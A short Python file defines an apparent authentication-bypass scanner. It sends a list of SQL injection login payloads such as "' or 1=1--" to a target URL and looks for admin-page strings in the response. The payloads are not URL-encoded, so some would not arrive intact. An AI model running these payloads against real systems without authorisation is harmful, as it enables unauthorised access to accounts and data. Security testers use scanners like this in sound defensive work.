## auth_bypass.py

class AuthBypass:
    """
    This class is responsible for testing authentication bypass vulnerabilities on a given target URL.
    """

    def test_auth(self, target_url: str) -> dict:
        """
        Tests for authentication bypass vulnerabilities at the specified target URL.

        Args:
            target_url (str): The URL of the target site to test for authentication bypass vulnerabilities.

        Returns:
            dict: A dictionary containing the results of the test, including success status and details.
        """
        findings = {
            'url': target_url,
            'vulnerability': 'Authentication Bypass',
            'status': 'Not Vulnerable',
            'details': None
        }

        # Example payloads for testing authentication bypass
        payloads = [
            "admin' --",
            "admin' #",
            "admin'/*",
            "' or 1=1--",
            "' or 1=1#",
            "' or 1=1/*",
            "') or '1'='1--",
            "') or ('1'='1--"
        ]

        for payload in payloads:
            # Constructing the URL to include the payload
            test_url = f"{target_url}?username={payload}&password="
            try:
                response = self.send_request(test_url)
                if self.is_vulnerable(response):
                    findings['status'] = 'Vulnerable'
                    findings['details'] = f"Payload that succeeded: {payload}"
                    break
            except Exception as e:
                findings['details'] = f"Error with payload {payload}: {str(e)}"
                continue  # Continue with the next payload

        return findings

    def send_request(self, url: str) -> str:
        """
        Sends a HTTP request to the given URL.

        Args:
            url (str): The URL to which the request is to be sent.

        Returns:
            str: The response from the server.
        """
        import http.client
        from urllib.parse import urlparse

        parsed_url = urlparse(url)
        query = parsed_url.query
        path = parsed_url.path
        if query:
            path += '?' + query
        conn = http.client.HTTPConnection(parsed_url.netloc)
        conn.request("GET", path)
        response = conn.getresponse()
        return response.read().decode('utf-8')

    def is_vulnerable(self, response: str) -> bool:
        """
        Determines if the response indicates an authentication bypass vulnerability.

        Args:
            response (str): The server response to analyze.

        Returns:
            bool: True if the response indicates a vulnerability, False otherwise.
        """
        # Check for successful login or unauthorized access
        success_indicators = [
            'Welcome, admin',
            'Logged in successfully',
            'Dashboard',
            'Admin area'
        ]
        for indicator in success_indicators:
            if indicator.lower() in response.lower():
                return True
        return False
